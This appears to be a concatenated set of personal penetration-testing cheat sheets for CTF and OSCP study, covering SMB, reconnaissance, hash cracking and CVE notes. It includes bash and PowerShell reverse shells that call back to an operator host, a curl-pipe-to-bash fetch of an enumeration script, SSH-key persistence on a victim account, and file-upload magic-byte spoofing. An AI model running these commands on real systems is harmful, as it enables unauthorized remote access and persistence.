**Navigating Samba** 36 | 37 | Use `dir` to list files: 38 | 39 | ```bash 40 | smb: \> dir 41 | ``` 42 | 43 | Use `cd` to change directory: 44 | 45 | ```bash 46 | smb: \> cd [DIRECTORY_PATH] 47 | ``` 48 | 49 | Use `lcd` to change directory locally: 50 | 51 | ```bash 52 | smb: \> lcd [LOCAL_DIRECTORY_PATH] 53 | ``` 54 | 55 | Use `exit` to exit the client: 56 | 57 | ```bash 58 | smb: \> exit 59 | ``` 60 | 61 | ## Download a File 62 | 63 | Download a file from a samba share in one line: 64 | 65 | ```bash 66 | $ smbclient '//[IP]/[SHARE]' -c 'lcd [DOWNLOAD_PATH]; cd [DIRECTORY]; get [FILENAME]' 67 | ``` 68 | 69 | The `-c` flag runs a series of commands. `lcd` changes directory on the local machine (i.e. your Linux host), so use this to specify where the downloaded file should land. 70 | 71 | ## Upload a File 72 | 73 | Upload a file to a samba share in one line: 74 | 75 | ```bash 76 | $ smbclient '//[IP]/[SHARE]' -c 'cd [REMOTE_PATH]; lcd [LOCAL_DIRECTORY]; put [LOCAL_FILENAME]' 77 | ``` 78 | 79 | Or, using `curl`: 80 | 81 | ```bash 82 | $ curl --upload-file /path/to/file -u [USERNAME] smb://[IP]/[SHARE] 83 | ``` 84 | 85 | ## List Shares 86 | 87 | Use the `-L` flag to list shares: 88 | 89 | ```bash 90 | $ smbclient -L hostname -U username 91 | ``` 92 | 93 | ## Mount a Share 94 | 95 | You can use the `mount` tool to mount a Samba share. 96 | 97 | First, make a `/mnt` directory if you don't have one. Do this with root privileges: 98 | 99 | ```bash 100 | $ sudo mkdir /mnt 101 | ``` 102 | 103 | Then make a subfolder in that directory and name it after the share you intend to mount: 104 | 105 | ```bash 106 | $ sudo mkdir /mnt/[SHARE] 107 | ``` 108 | 109 | Then install `cifs-utils` if you don't already have them: 110 | 111 | ```bash 112 | $ sudo apt install cifs-utils 113 | ``` 114 | 115 | These utilities will help you remotely mount SMB shares. 116 | 117 | Then run this command to mount the share: 118 | 119 | ```bash 120 | $ sudo mount -t cifs //[IP]/[SHARE] /mnt/[SHARE] 121 | ``` 122 | 123 | Hit enter when prompted for a password. 124 | 125 | ### Unmount the Share 126 | 127 | Unmount the share if you don't need it anymore: 128 | 129 | ```bash 130 | $ sudo umount /mnt/[SHARE] 131 | ``` 132 | 133 | ## Practical Examples 134 | 135 | - [[Writeups/Hack the Box/Boxes/Blue/5 - Enumeration#Enumerating SMB]] 136 | 137 | # Tags 138 | 139 | #cheat-sheet #smb -------------------------------------------------------------------------------- /Cheat Sheets/Common Tools/smbmap.md: -------------------------------------------------------------------------------- 1 | # smbmap 2 | A tool for enumerating Samba Shares 3 | 4 | ## Basic Syntax 5 | 6 | ```bash 7 | smbmap -H [HOST] -P [PORT] 8 | ``` 9 | 10 | ## Practical Examples 11 | - [Ippsec Nest](https://www.youtube.com/watch?v=tDbVw6uGx8g&t=345) 12 | - [[Writeups/Hack the Box/Boxes/Blue/5 - Enumeration#Enumerating SMB]] 13 | 14 | # Tags 15 | 16 | #cheat-sheet #enum #smb -------------------------------------------------------------------------------- /Cheat Sheets/Enumeration/Docker Enumeration.md: -------------------------------------------------------------------------------- 1 | # Docker Enumeration 2 | 3 | ## deepce 4 | 5 | Deepce is an automated enumeration tool that can be used to scan docker containers, similar to [[Linux Enumeration#Linpeas|Linpeas]]. 6 | 7 | ### Setup 8 | 9 | Git repository: [https://github.com/stealthcopter/deepce](https://github.com/stealthcopter/deepce) 10 | 11 | Install on host: 12 | 13 | ```bash 14 | $ wget https://github.com/stealthcopter/deepce/raw/main/deepce.sh 15 | ``` 16 | 17 | ### Run 18 | 19 | [[Fundamental Skills#Python Webserver|Run a webserver]] on host machine to serve the script. 20 | 21 | On target machine: 22 | 23 | ```bash 24 | $ curl http://[HOST_IP]:[SERVER_PORT]/deepce.sh | bash 25 | ``` 26 | 27 | ### Practical Example 28 | 29 | Ippsec's [Laboratory Video](https://youtu.be/ozmHeApuSj8?t=1370) 30 | 31 | # Tags 32 | 33 | #cheat-sheet #enum #docker -------------------------------------------------------------------------------- /Cheat Sheets/Enumeration/Reconnaisance.md: -------------------------------------------------------------------------------- 1 | # Reconnaisance 2 | These tools help you get a sense of what a target does and what services are running on it. 3 | 4 | ## nmap 5 | 6 | I always start with an `nmap` scan. It is a tool for discovering open ports (communication points) on a network, and what services are running on them. 7 | 8 | A good general purpose `nmap` command looks like this: 9 | 10 | ```bash 11 | $ nmap -v -sC -sV -oA nmap/ [IP/HOSTNAME] 12 | ``` 13 | 14 | It shows ports as it finds them with the `-v` flag, tries to enumerate service versions and runs some default scripts, and then outputs the results to the `nmap/` directory, which you must make first (with `mkdir nmap`) 15 | 16 | By default, `nmap` only scans the 1000 most common ports. To scan all ports, run this command: 17 | 18 | ```bash 19 | $ nmap -p- -oA nmap/all-ports [IP/HOSTNAME] 20 | ``` 21 | 22 | It is best to do this after your first scan has completed. 23 | 24 | See more details about nmap's various functions in the [[nmap|nmap cheatsheet]], including: 25 | - Installation Instructions 26 | - Scanning Specific Ports 27 | - Scanning UDP Services 28 | - Timing and Intrusion Detection Evasion 29 | 30 | ## Autorecon 31 | 32 | This tool performs a number of automated scans. It starts with an `nmap` scan, and uses the results from that to launch a number of other scans, such as directory discovery with [[Gobuster]]. 33 | 34 | Download the tool from the [Git Repository](https://github.com/Tib3rius/AutoRecon), where you can also see a whole host of extra usage details. 35 | 36 | As a personal preference, I like doing my standard reconnaisance manually, and running autorecon in the background. This helps me process the information better as I find it. 37 | 38 | It is useful as it cannot forget crucial steps, for example an all-ports `nmap` scan. 39 | 40 | **Basic Syntax** 41 | 42 | ```bash 43 | autorecon [IP/Domain Name] 44 | ``` 45 | 46 | **Multiple Targets** 47 | 48 | Specify multiple targets after you define your options (flags). E.g. 49 | 50 | ```bash 51 | autorecon [OPTIONS] a.b.c.d foo.bar w.x.y.z 52 | ``` 53 | 54 | Or use CIDR Notation to define a range of targets: 55 | 56 | ```bash 57 | autorecon [OPTIONS] a.b.c.d/24 58 | ``` 59 | 60 | Or use a target file with the `-t` flag: 61 | 62 | ```bash 63 | autorecon -t /path/to/target_file a.b.c.d 64 | ``` 65 | 66 | **Output Options** 67 | 68 | Set an output directory with the `-o` flag: 69 | 70 | ```bash 71 | autorecon -o /path/to/output_dir example.com 72 | ``` 73 | 74 | ### Running a Webserver 75 | 76 | Once your scans are finished, you can easily view the results by starting a webserver in the `/results` directory and visiting it on localhost: 77 | 78 | ```bash 79 | ┌──(mac㉿kali)-[~/Documents/HTB/BOX/results/] 80 | └─$ python3 -m http.server 81 | Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... 82 | ``` 83 | 84 | Then visit `http://localhost:8000` and view the results in browser. 85 | 86 | # Tags 87 | 88 | #cheat-sheet #enum -------------------------------------------------------------------------------- /Cheat Sheets/Linux/Linux Misc.md: -------------------------------------------------------------------------------- 1 | # Misc 2 | 3 | ## Terminal Types 4 | [https://unix.stackexchange.com/questions/60641/linux-difference-between-dev-console-dev-tty-and-dev-tty0](https://unix.stackexchange.com/questions/60641/linux-difference-between-dev-console-dev-tty-and-dev-tty0) 5 | [https://unix.stackexchange.com/questions/21280/difference-between-pts-and-tty/21294](https://unix.stackexchange.com/questions/21280/difference-between-pts-and-tty/21294) 6 | [https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/](https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/) 7 | 8 | ## Logging 9 | [https://serverfault.com/questions/336217/how-do-i-log-every-command-executed-by-a-user](https://serverfault.com/questions/336217/how-do-i-log-every-command-executed-by-a-user) 10 | [https://access.redhat.com/documentation/en-us/red\_hat\_enterprise\_linux/6/html/security\_guide/sec-understanding\_audit\_log\_files](https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-understanding_audit_log_files) 11 | 12 | # Tags 13 | 14 | #cheat-sheet #unix -------------------------------------------------------------------------------- /Cheat Sheets/Linux/Linux Shells.md: -------------------------------------------------------------------------------- 1 | # Shells 2 | 3 | Always remember to check your IP: [[Linux Networking#Get your IP]] 4 | 5 | ## Bash Reverse 6 | 7 | ```bash 8 | bash -i >& /dev/tcp/[IP]/[PORT] 0>&1 9 | ``` 10 | 11 | or 12 | 13 | ```bash 14 | bash -c 'bash -i >& /dev/tcp/[IP]/[PORT] 0>&1' 15 | ``` 16 | 17 | ## Upgrading a Shell 18 | 19 | Often, you can simply run `/bin/bash` or equivalent to launch a better shell. 20 | 21 | Use `echo "$SHELL"` to determine the shell you're using. Then specify the full path to that shell and it will sometimes spawn you a better, more interactive shell. 22 | 23 | ```bash 24 | ┌──(mac㉿kali)-[~] 25 | └─$ echo "$SHELL" 26 | /bin/bash 27 | ┌──(mac㉿kali)-[~] 28 | └─$ /bin/bash 29 | ``` 30 | 31 | ### Using Python to spawn /bin/bash 32 | 33 | ```bash 34 | which bash 35 | python -c 'import pty; pty.spawn("/bin/bash")' 36 | ``` 37 | 38 | ### Backgrounding Shell Trick 39 | 40 | Within your shell, possibly after spawning a `/bin/bash` process with python, do the following to fix the interactivity in your shell: 41 | 42 | - Press `Ctrl + z` to background the process 43 | - Execute the command `stty raw -echo` on your host machine 44 | - Type `fg` on your host (you will not see this on screen) 45 | - Press the `Enter` key twice 46 | 47 | You should now have an interactive shell! 48 | 49 | You can then run `export TERM=xterm` to allow clearing the terminal. 50 | 51 | If your line wrapping seems off, you may need to recalibrate the columns and rows in your new shell. Do the following: 52 | 53 | - Execute `stty -a` on your host machine and make a note of the rows and columns number 54 | - In your new shell, execute `stty rows Y cols X` where Y is your number of rows and X is your number of columns 55 | 56 | *Note:* This does not work in meterpreter or metasploit shells in general. 57 | 58 | ### Use your shell to write an SSH key 59 | 60 | This is one of the most reliable ways of getting an interactive shell - if you have permissions to pull it off. 61 | 62 | First, generate a key pair to use to access the box (do this on your host machine): 63 | 64 | ```bash 65 | $ ssh-keygen -f key_name 66 | ``` 67 | 68 | Then read the public key and copy it to your clipboard: 69 | 70 | ```bash 71 | $ cat key_name.pub 72 | ``` 73 | 74 | On the victim box, find the user you would like to remotely access - in this example, `victim`: 75 | 76 | ```bash 77 | $ echo 'CONTENTS_OF_KEY' >> /home/victim/.ssh/authorized_keys 78 | ``` 79 | 80 | Then ssh in from your host: 81 | 82 | ```bash 83 | ssh -i key_name victim@IP_ADDRESS 84 | ``` 85 | 86 | ### Girsh 87 | 88 | [Repo link](https://github.com/nodauf/Girsh) 89 | 90 | # Tags 91 | 92 | #cheat-sheet #unix -------------------------------------------------------------------------------- /Cheat Sheets/Networking/Common Ports.md: -------------------------------------------------------------------------------- 1 | # Common Ports 2 | 3 | ## What is a Port? 4 | 5 | A port is simply a channel over which a computer can communicate. Think of it like having two letterboxes - one for large parcels, and one for letters. 6 | 7 | Ports can send and receive data. A computer can open and close ports at any time, and many services will communicate over a specific port by default. It's like going to the post office and knowing which desk you should go to to send a parcel or a letter. 8 | 9 | The reason a computer has multiple ports is so different services (like email, SSH, and HTTP traffic) can be directed to specific parts of a computer and avoid congestion. 10 | 11 | ## Common Ports 12 | 13 | Lots of common services communicate on a specific port by default. If you see these ports come up in a scan, you know what they might do. 14 | 15 | ### 22 - SSH 16 | 17 | Port 22 usually hosts SSH. This stands for 'secure shell' and is a way of remotely accessing a computer. 18 | 19 | If you see port 22 open, it means you may be able to remotely access the computer if you have a user's SSH password or SSH private key. 20 | 21 | See more: 22 | - [[Fundamental Skills#SSH]] 23 | - [[CVE-2012-5975]] 24 | 25 | ### 80 - HTTP 26 | 27 | Port 80 serves HTTP traffic. This is the default port for unprotected traffic sent over the web - for example, a `GET` request to visit `http://www.google.com`, or a request back to your own webserver that is hosting an enumeration script. 28 | 29 | If you see HTTP open, it means there should be a publicly accessible website - always a good starting point. 30 | 31 | See more: 32 | - [[Fundamental Skills#Sending HTTP Requests]] 33 | 34 | ### 443 - HTTPS 35 | 36 | Port 443 serves HTTPS traffic, which is just like HTTP but encrypted using TLS. 37 | 38 | This is essentially a 'secure' version of HTTP, and is used to protect sensitive data being transmitted over the internet. 39 | 40 | If you see this port open, there is likely a HTTPS version of the website you are visiting. It may mean you will be able to view the site's SSL/TLS certificate, which can sometimes contain useful information (including domain names). 41 | 42 | # Tags 43 | 44 | #cheat-sheet #networking -------------------------------------------------------------------------------- /Cheat Sheets/Password Cracking/Creating a Hashfile.md: -------------------------------------------------------------------------------- 1 | # Creating a Hashfile 2 | 3 | ## Adding a Hash 4 | 5 | ```bash 6 | echo -n HASH >> hashes 7 | ``` 8 | 9 | The `-n` flag removes the trailing newline 10 | 11 | ## Remove Trailing Newlines 12 | 13 | **Remove One:** 14 | 15 | ```bash 16 | truncate -s $(($(stat -c '%s' hashes)-1)) hashes 17 | ``` 18 | 19 | **Remove All:** 20 | 21 | ```bash 22 | sed -i 's/$//' hashes 23 | ``` 24 | 25 | # Tags 26 | 27 | #cheat-sheet #cryptography -------------------------------------------------------------------------------- /Cheat Sheets/Password Cracking/Generating a Wordlist.md: -------------------------------------------------------------------------------- 1 | # Generating a Wordlist 2 | 3 | You can generate a custom wordlist for password cracking when you have an idea of what a password might be, and think there may be some variation on a word or phrase. 4 | 5 | ## Using Hashcat 6 | 7 | Use a rules file (found in `/usr/share/hashcat/rules`) 8 | 9 | You can chain these rules together to create a larger wordlist. I like starting with 3-4 password ideas specific to the user I am trying to crack, then using `best64.rule` followed by `toggles1.rule` on the result. 10 | 11 | [[Hashcat|See more about Hashcat]] 12 | 13 | ### Toggles 14 | 15 | ```bash 16 | hashcat --force --stdout passwords -r /usr/share/hashcat/rules/toggles1.rule > passwordlist 17 | ``` 18 | 19 | ### Best64 Rules 20 | ```bash 21 | hashcat --force --stdout passwords -r /usr/share/hashcat/rules/best64.rule > passwordlist 22 | ``` 23 | 24 | ## Trimming Wordlist 25 | 26 | ### Unique Passes 27 | 28 | ```bash 29 | cat passwordlist | sort -u > passwordlist-unique 30 | ``` 31 | 32 | ### By Length 33 | 34 | ```bash 35 | cat passwordlist | awk 'length($0) > 7' > passwordlist-eight 36 | ``` 37 | 38 | ### Check Number 39 | 40 | Pipe output to `wc -l` to check how many are in the list 41 | 42 | # Tags 43 | 44 | #cheat-sheet #cryptography -------------------------------------------------------------------------------- /Cheat Sheets/Password Cracking/Hashcat.md: -------------------------------------------------------------------------------- 1 | # Hashcat 2 | 3 | Excellent tutorial available [here](https://resources.infosecinstitute.com/topic/hashcat-tutorial-beginners/) 4 | 5 | It is advised to crack on your host machine, not on a VM. Installing Windows Subsytem for Linux can be good for this if you have a windows host machine. Cloud computing can also be useful, although expensive. 6 | 7 | ## Basic Syntax 8 | 9 | ```bash 10 | hashcat -m 0 -a 0 -o cracked hashes /usr/share/wordlists/rockyou.txt 11 | ``` 12 | 13 | Where `-o` designates output file, `-a 0` designates dictionary mode, and `-m 0` is mode 0 (MD5) 14 | 15 | Hashcat will give you output similar to the below, with either `Status: Cracked` (success) or `Status: Exhausted` (failure): 16 | 17 | ```bash 18 | HASH:CRACKED_PASS 19 | 20 | Session..........: hashcat 21 | Status...........: Cracked 22 | Hash.Name........: HASH_TYPE 23 | Hash.Target......: HASH 24 | Time.Started.....: Sat Apr 3 14:55:24 2021 (8 secs) 25 | Time.Estimated...: Sat Apr 3 14:55:32 2021 (0 secs) 26 | Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) 27 | Guess.Queue......: 1/1 (100.00%) 28 | Speed.#1.........: 46 H/s (10.53ms) @ Accel:32 Loops:1024 Thr:1 Vec:4 29 | Recovered........: 1/1 (100.00%) Digests 30 | Progress.........: 256/14344385 (0.00%) 31 | Rejected.........: 0/256 (0.00%) 32 | Restore.Point....: 224/14344385 (0.00%) 33 | Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:31744-32768 34 | Candidates.#1....: tiffany -> freedom 35 | ``` 36 | 37 | If you get a `Separator unmatched` error, this probably means hashcat is expecting some sort of separator character (usually a colon `:`) to be somewhere in your hash. This means you have picked an invalid mode, and need to choose a different one. 38 | 39 | ## Choosing Mode 40 | 41 | Run this command to see hashcat's list of example hashes. 42 | 43 | ```bash 44 | $ hashcat --example-hashes 45 | ``` 46 | 47 | This list is also available [here](https://hashcat.net/wiki/doku.php?id=example_hashes) 48 | 49 | You can search the list with `grep` to find hashes that are similar to yours: 50 | 51 | ```bash 52 | $ hashcat --example-hashes | grep '[PORTION OF HASH]' -B 3 53 | ``` 54 | 55 | The `-B 3` flag shows the previous 3 lines before the match. This gives us the details of the `MODE` number and the algorithm name. 56 | 57 | **Add Notes on using regexes here.** 58 | 59 | See the [[Identifying Hashes]] cheat sheet for more techniques. 60 | 61 | # Tags 62 | 63 | #cheat-sheet #cryptography -------------------------------------------------------------------------------- /Cheat Sheets/Password Cracking/Identifying Hashes.md: -------------------------------------------------------------------------------- 1 | # Identifying Hashes 2 | Run this command to find a list of potential hashing algorithms 3 | 4 | ```bash 5 | $ hashid [HASH] 6 | ``` 7 | 8 | ## Pair with Hashcat 9 | 10 | Run these through [[Hashcat]] to see what modes they are for cracking: 11 | 12 | ```bash 13 | $ hashcat --example-hashes | grep [ALGORITHM-NAME] -B 2 14 | ``` 15 | 16 | If you have a large number of candidates, search them all with this one-liner: 17 | 18 | ```bash 19 | $ hashid [HASH] | awk '{print $2}' | while read line; do hashcat --example-hashes | grep $line -B 1; done 20 | ``` 21 | 22 | This is a quick and dirty bash script that takes the second column of the `hashid` output (the guessed algorithm) and passes it to hashcat. It could be improved, as it also passes the hash itself to the `grep` command. 23 | 24 | # Tags 25 | 26 | #cheat-sheet #cryptography -------------------------------------------------------------------------------- /Cheat Sheets/Password Cracking/John the Ripper.md: -------------------------------------------------------------------------------- 1 | # John the Ripper 2 | ## Basic Syntax 3 | 4 | ```bash 5 | john --format=FORMAT --wordlist=/usr/share/wordlists/rockyou.txt hashes 6 | ``` 7 | 8 | # Tags 9 | 10 | #cheat-sheet #cryptography -------------------------------------------------------------------------------- /Cheat Sheets/Shells/Reverse Shells.md: -------------------------------------------------------------------------------- 1 | # Reverse Shells 2 | 3 | ## Powershell 4 | 5 | ``` 6 | powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.92',9001);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" 7 | ``` 8 | 9 | ## Troubleshooting 10 | 11 | Why isn't my shell working? 12 | - try base64 encoding and piping to `base64 -d | bash` 13 | - try specifying `/bin/sh` 14 | - try a staged payload 15 | - try curling a `.sh` file into `sh` or `bash` -------------------------------------------------------------------------------- /Cheat Sheets/Web Hacking/Deserialisation.md: -------------------------------------------------------------------------------- 1 | # Deserialisation 2 | 3 | ## PHP 4 | 5 | ### Magic Methods 6 | 7 | ### Real World Example 8 | 9 | ## Java 10 | 11 | ## C# 12 | 13 | ## Useful Tools 14 | 15 | ### phpggc 16 | 17 | ### ysoserial 18 | 19 | # Tags 20 | 21 | #cheat-sheet #web #deserialisation -------------------------------------------------------------------------------- /Cheat Sheets/Web Hacking/File Upload.md: -------------------------------------------------------------------------------- 1 | # File Upload 2 | 3 | ## Magic Bytes 4 | 5 | **View magic bytes** 6 | ```bash 7 | head -c 20 /path/to/file | xxd 8 | ``` 9 | 10 | **Adding Magic Bytes to File** 11 | 12 | Append magic bytes of safe file (e.g. png) to blank unsafe file: 13 | ```bash 14 | head -c 8 /path/to/safe/file > unsafe\_file 15 | ``` 16 | 17 | Or concatenate file and stored magic bytes: 18 | ```bash 19 | cat /path/to/magic/bytes /path/to/file > new_file 20 | ``` 21 | 22 | # Tags 23 | 24 | #cheat-sheet #web -------------------------------------------------------------------------------- /Exam Resources/OSCP/Exam Details.md: -------------------------------------------------------------------------------- 1 | # Exam Details 2 | 3 | ## Key Details 4 | 5 | **Length:** 6 | - 23 Hours and 45 Minutes for the exam 7 | - 24 Hours to submit the report 8 | 9 | **Available Points** 10 | - 100 Points from Machines 11 | - 5 Bonus Points from Report 12 | 13 | **Passing Grade** 14 | - 70 Points needed to pass 15 | 16 | ## Exam Guide 17 | 18 | The comprehensive exam guide. READ THIS IN FULL! 19 | 20 | [https://help.offensive-security.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide](https://help.offensive-security.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide) 21 | 22 | **Exam Length in Detail** 23 | 24 | ![[Pasted image 20210415131342.png]] 25 | 26 | ## Exam Support Page 27 | 28 | This page collects several articles on exam topics, including machine hints. 29 | 30 | [https://help.offensive-security.com/hc/en-us/categories/360003918111-Penetration-Testing-with-Kali-Linux-PEN-200-](https://help.offensive-security.com/hc/en-us/categories/360003918111-Penetration-Testing-with-Kali-Linux-PEN-200-) 31 | 32 | ## Exam Rules & Restrictions 33 | 34 | ### Restrictions on Tools 35 | 36 | In summary, commercial tools, automatic exploitation tools, and mass scanning tools are forbidden. Source: [https://help.offensive-security.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide#exam-restrictions](https://help.offensive-security.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide#exam-restrictions) 37 | 38 | ![[Pasted image 20210415125831.png]] 39 | 40 | **One use** of Metasploit is allowed. However, utility such as the metasploit handler module and the msfvenom payload generator have no limitations on use. Source: [https://help.offensive-security.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide#metasploit-restrictions](https://help.offensive-security.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide#metasploit-restrictions) 41 | 42 | ![[Pasted image 20210415130533.png]] 43 | 44 | **UPDATE:** on 22/04 @\_superhero1 on twitter revealed they [failed OSCP](https://twitter.com/_superhero1/status/1385206684109447168) because of a linpeas auto exploit 45 | 46 | ![Image](https://pbs.twimg.com/media/EzlPxHhX0AEj3N2?format=png&name=small) 47 | 48 | OffSec Statement: [https://www.offensive-security.com/offsec/understanding-pentest-tools-scripts/](https://www.offensive-security.com/offsec/understanding-pentest-tools-scripts/) 49 | 50 | ![[Pasted image 20210429082258.png]] 51 | 52 | Looks like if you update LinPeas it should have the auto-exploit feature removed. 53 | 54 | Issue: [https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/issues/125](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/issues/125) 55 | 56 | ![[Pasted image 20210429083201.png]] 57 | 58 | ### Proctoring and Use of Notes 59 | 60 | OSCP is open book - you can use google and your own notes in the exam. Source: [https://www.offensive-security.com/offsec/proctoring/](https://www.offensive-security.com/offsec/proctoring/) 61 | 62 | ![[Pasted image 20210415130048.png]] -------------------------------------------------------------------------------- /Exam Resources/OSCP/OSCP Resources.md: -------------------------------------------------------------------------------- 1 | # OSCP Resources 2 | 3 | ## My Resources 4 | 5 | My Experience: [[OSCP - My Experience]] 6 | 7 | Practice Exam Full Writeups + Reports: [[OSCP Practice Exam Writeups]] 8 | 9 | ## Gitbook Guides 10 | 11 | Xapax Guide: 12 | - Original Repo: [https://xapax.github.io/security/](https://xapax.github.io/security/) 13 | - Forked, slightly out-of-date version (but on Gitbook where it looks nice): [https://sushant747.gitbooks.io/total-oscp-guide/content/](https://sushant747.gitbooks.io/total-oscp-guide/content/) -------------------------------------------------------------------------------- /Projects/CTF Tools.md: -------------------------------------------------------------------------------- 1 | # CTF Tools 2 | This repository is a collection of tools to be used in CTFs and hacking practice such as Hack the Box. 3 | 4 | The tools are not necessarily optimised. Many of them are rebuilds of common tools for the purpose of learning. 5 | 6 | Find the repository here: [https://github.com/Twigonometry/CTF-Tools](https://github.com/Twigonometry/CTF-Tools) 7 | 8 | ## Password Cracker 9 | 10 | This mini project explores common password cracking techniques, such as brute force attacks and dictionary attacks. 11 | 12 | [Password Cracker Folder](https://github.com/Twigonometry/CTF-Tools/tree/master/password_cracker) 13 | 14 | [Password Cracker Issues Board](https://github.com/Twigonometry/CTF-Tools/projects/2) 15 | 16 | ## Repeater 17 | 18 | This is an interactive HTTP Request repeater, similar to Burp Suite. It currently supports GET and POST. 19 | 20 | [Repeater Folder](https://github.com/Twigonometry/CTF-Tools/tree/master/repeater) 21 | 22 | [Repeater Issues Board](https://github.com/Twigonometry/CTF-Tools/projects/1) 23 | 24 | ## Scripts 25 | 26 | This folder contains various scripts for... various things 27 | 28 | **Simple Python Server** 29 | 30 | This is a fork of another server gist, tweaked to support POST requests. 31 | 32 | **Juice Shop** 33 | 34 | [This folder](https://github.com/Twigonometry/CTF-Tools/tree/master/scripts/juice-shop) contains a number of payloads for OWASP Juice Shop, which we covered in SESH sessions in September-October 2020. 35 | 36 | ## Hack the Box 37 | 38 | [This folder](https://github.com/Twigonometry/CTF-Tools/tree/master/hack_the_box) contains a number of scripts that I've used in Hack the Box. 39 | 40 | I make commits locally and then push them up when the box retires. Commits may be dated before the box retired, but will not be published publicly until that date. 41 | 42 | # Tags 43 | 44 | #project -------------------------------------------------------------------------------- /SESH/CTFs/BakeryTF/Challenge Development Index.md: -------------------------------------------------------------------------------- 1 | # Challenge Development Index 2 | 3 | Here I will add notes about the development process for SESH CTF challenges. These are to be added. -------------------------------------------------------------------------------- /SESH/SESH Index.md: -------------------------------------------------------------------------------- 1 | # SESH Index 2 | 3 | Index for all notes related to [Sheffield Ethical Student Hackers Society](https://shefesh.com) (SESH), which I have helped to run since Summer 2020. 4 | 5 | ## Demos 6 | 7 | [[Deserialisation Demo]] for a basic PHP deserialisation vulnerability -------------------------------------------------------------------------------- /Vulnerabilities/Networking/CVE-2020-12271.md: -------------------------------------------------------------------------------- 1 | # CVE-2020-12271 2 | 3 | CVE Details: 4 | - [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12271](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12271) 5 | - [https://www.rapid7.com/blog/post/2020/04/27/cve-2020-12271-sophos-xg-firewall-pre-auth-sql-injection-vulnerability-remediation-guidance-and-exposure-overview/](https://www.rapid7.com/blog/post/2020/04/27/cve-2020-12271-sophos-xg-firewall-pre-auth-sql-injection-vulnerability-remediation-guidance-and-exposure-overview/) 6 | 7 | ## Affected Versions 8 | 9 | SFOS 17.0, 17.1, 17.5, and 18.0 10 | 11 | ## What Does it Do? 12 | 13 | Pre-Authentication SQL Injection 14 | - can allow exfiltration of XG firewall-resident data, which can contain local user credentials 15 | 16 | ![[Pasted image 20210502180238.png]] 17 | 18 | (source: https://www.tenable.com/blog/cve-2020-12271-zero-day-sql-injection-vulnerability-in-sophos-xg-firewall-exploited-in-the-wild) 19 | 20 | ## Exploit 21 | 22 | Known to be exploited in the wild, but no PoC has been released -------------------------------------------------------------------------------- /Vulnerabilities/SSH/CVE-2012-5975.md: -------------------------------------------------------------------------------- 1 | # CVE-2012-5975 2 | CVE Details: [https://www.cvedetails.com/cve/CVE-2012-5975/](https://www.cvedetails.com/cve/CVE-2012-5975/) 3 | 4 | ## Affected Technologies 5 | 6 | |Technology|Version| 7 | |-|-| 8 | |Tectia Server|6.0.4 - 6.0.20| 9 | |Tectia Server|6.1.0 - 6.1.12| 10 | |Tectia Server|6.2.0 - 6.2.5| 11 | |Tectia Server|6.3.0 - 6.3.2| 12 | 13 | ## How Does it Work? 14 | 15 | The attacker sends a `USERAUTH CHANGE REQUEST`, then logs on as a known SSH user without supplying a password. 16 | 17 | ## Exploit 18 | 19 | **Metasploit Module** 20 | 21 | `exploit/unix/ssh/tectia_passwd_changereq` 22 | 23 | # Tags 24 | 25 | #cve -------------------------------------------------------------------------------- /Vulnerabilities/Vulnerabilities Index.md: -------------------------------------------------------------------------------- 1 | # Vulnerabilities Index 2 | 3 | This folder contains a number of CVE writeups. They are written to be quick references for CVEs I've found useful in challenges etc. 4 | 5 | I'm not collecting every CVE in existence - that's what [ExploitDB](https://www.exploit-db.com) is for. This is just to collect ones I have found useful, and provide PoC examples for quick reference (especially for ones where PoCs were hard to come by, or required adjusting to make them work) 6 | 7 | ## Common Protocols 8 | 9 | ### SMB 10 | 11 | - Eternal Blue (MS17-010): [[CVE-2017-0143]] 12 | 13 | ### SSH 14 | 15 | - Tectia Auth Bypass: [[CVE-2012-5975]] 16 | 17 | # Tags 18 | 19 | #cve -------------------------------------------------------------------------------- /Vulnerabilities/Windows/CVE-2017-0143.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-0143 2 | 3 | CVE Details: 4 | - [https://www.rapid7.com/db/vulnerabilities/msft-cve-2017-0143/](https://www.rapid7.com/db/vulnerabilities/msft-cve-2017-0143/) 5 | - [https://www.cvedetails.com/cve/CVE-2017-0143/](https://www.cvedetails.com/cve/CVE-2017-0143/) 6 | 7 | ## Affected Technologies 8 | 9 | SMBv1 Servers on several operating systems: 10 | - Windows Vista SP2 11 | - Windows Server 2008 SP2, R2 SP1 12 | - Windows 7 SP1 13 | - Windows 8.1 14 | - Windows Server 2012 Gold, R2 15 | - Windows RT 8.1 16 | - Windows 10 Gold, 1511, 1607 17 | - Windows Server 2016 18 | 19 | ## What Does it Do? 20 | 21 | Allows remote code execution on a vulnerable server. 22 | 23 | ## Check if a System is Vulnerable 24 | 25 | If port 445 is running: 26 | 27 | ```bash 28 | $ nmap --script vuln [IP] -p 445 29 | ``` 30 | 31 | ## Exploits 32 | 33 | **Metasploit Module** 34 | 35 | ``` 36 | exploit/windows/smb/ms17_010_eternalblue 37 | ``` 38 | 39 | **Alternative Implementations** 40 | 41 | Copy exploit code: 42 | 43 | ```bash 44 | $ searchsploit -m windows/remote/42315.py 45 | ``` 46 